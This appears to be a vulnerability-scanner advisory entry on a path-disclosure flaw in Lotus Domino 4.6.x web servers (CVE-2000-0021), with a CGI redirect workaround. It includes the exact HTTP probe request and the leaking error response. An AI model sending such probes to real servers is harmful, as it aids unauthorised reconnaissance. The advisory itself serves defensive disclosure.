| VID |
22155 |
| Severity |
20 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The Lotus Domino web server has a path revealing vulnerability via a request to a non-existent script in /cgi-bin.
Lotus Domino Server is an application framework for web based collaborative software. It runs on multiple platforms including Windows and UNIX. By default, this server has the /cgi-bin virtual path, is mapped to \domino\cgi-bin directory. One of some vulnerabilities in handling of CGI requests is a path revealing vulnerability that allows the remote attacker to determine the real path of the server. When a remote attacker sends the request for a non-existent script in the /cgi-bin directory as the following:
GET /cgi-bin/non_existent_file HTTP/1.0
The Domino server return the error message that includes the real path of the server as the following:
HTTP/1.1 500 Bad script request -- no variation is executable
Server: Lotus-Domino/0
.....
Error 500
Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/non_existent_file' is executable
A remote attacker can obtain the signification information of system such as OS, set up of file system. This information can be used to formulate further attacks.
* Platforms Affected:
Lotus Domino HTTP 4.6.x
* References:
http://online.securityfocus.com/bid/881
http://www.iss.net/security_center/static/4389.php |
| Recommendation |
The workaround is to create a URL redirect in the DOMCFG.NSF database that redirects any anomalous CGI requests to another URL. Since any non-existent CGI calls can cause this error, the following workaround is suggested.
* If the customer does not require the use of any CGI's, then the entire /cgi-bin directory can be redirected to another URL (a Notes database, or html file). If any "/cgi-bin" requests are made, they will be directed to this URL and are not processed as CGI.
* If the customer does require the use of CGI's the following setup will be required:
1) In the HTTP section of the Server Document, change the "CGI URL path" field to a different URL path. This does not require a change for the "CGI directory" field, such that the location on the hard drive for CGI's will remain the same. Only the URL which invokes CGI's will be altered.
Example: The default CGI URL path is "/cgi-bin"; change this to "/scripts/cgi-bin". Now, whenever a /cgi-bin request is made, it is recognized as a URL instead of a CGI.
2) Create a URL Redirect document in the DOMCFG.NSF for each specific CGI that resides on the server. Specify the incoming URL path as "/cgi-bin", and the redirection URL as "/scripts/cgi-bin".
Example: A customer has a CGI named "Xrun.cgi" in the domino/cgi-bin directory. Regularly, any requests to execute the CGI would come in as "http://hostname/cgi-bin/Xrun.cgi". This URL request is redirected to "http://hostname/scripts/cgi-bin/Xrun.cgi", where Domino will recognize it as a CGI, and run the script. In this case, the "/cgi-bin" URL itself is not recognized as a CGI request. It is only the redirection to "/scripts/cgi-bin" that will cause the Domino server to process it as a CGI script |
| Related URL |
CVE-2000-0021 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
